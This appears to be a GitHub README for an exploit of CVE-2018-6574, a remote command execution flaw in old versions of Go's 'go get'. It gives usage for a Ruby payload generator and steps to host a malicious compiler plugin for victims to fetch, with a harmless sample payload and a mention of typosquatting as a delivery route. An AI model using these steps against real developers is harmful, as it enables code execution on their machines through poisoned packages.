Skip to content

Latest commit

 

History

History

CVE-2018-6574

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

CVE-2018-6574 | go get RCE

Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.

An attack has to be approached locally. A single authentication is needed for exploitation. So it's more user or a function that uses the same approach may get exploited via typosquatting technique or another ways.

Usage

Exploit

ruby cve-2018-6574_exploit.rb <PAYLOAD>

PoC

PoC based in your case and payload.

-> ruby cve-CVE-2018-6574_exploit.rb "touch /tmp/owned"
[1] Upload 'go-get-rce' folder to github
[2] try: go get https://github.com/[username]/go-get-rce.git
  • Replace touch /tmp/owned payload with your own.
  • A directory called go-get-rce will be created contains a package and the malicious plugin.
  • Upload go-get-rce directory to github or any remote host
  • from the vulnerable function execute (go get https://github.com/[username]/go-get-rce)

References